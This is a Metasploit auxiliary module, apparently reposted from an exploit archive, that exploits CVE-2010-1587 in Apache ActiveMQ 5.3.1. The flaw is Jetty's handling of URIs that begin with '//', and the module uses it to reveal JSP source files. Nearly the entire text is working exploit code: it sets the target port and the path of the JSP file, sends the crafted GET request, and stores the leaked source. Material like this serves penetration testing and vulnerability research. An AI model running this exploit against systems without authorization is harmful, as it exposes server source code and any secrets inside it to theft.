Share
## https://sploitus.com/exploit?id=PACKETSTORM:181098
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Apache ActiveMQ JSP Files Source Disclosure',  
'Description' => %q{  
This module exploits a source code disclosure in Apache ActiveMQ. The  
vulnerability is due to the Jetty's ResourceHandler handling of specially crafted  
URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1  
over Windows 2003 SP2 and Ubuntu 10.04.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Veerendra G.G', # Vulnerability discovery  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2010-1587' ],  
[ 'OSVDB', '64020' ],  
[ 'BID', '39636' ],  
[ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]  
]  
))  
  
register_options(  
[  
Opt::RPORT(8161),  
OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])  
])  
end  
  
def run_host(ip)  
  
print_status("#{rhost}:#{rport} - Sending request...")  
uri = normalize_uri(target_uri.path)  
res = send_request_cgi({  
'uri' => uri,  
'method' => 'GET',  
})  
  
if res and res.code == 200  
contents = res.body  
fname = File.basename(datastore['TARGETURI'])  
path = store_loot(  
'apache.activemq',  
'text/plain',  
ip,  
contents,  
fname  
)  
print_status("#{rhost}:#{rport} - File saved in: #{path}")  
else  
print_error("#{rhost}:#{rport} - Failed to retrieve file")  
return  
end  
end  
end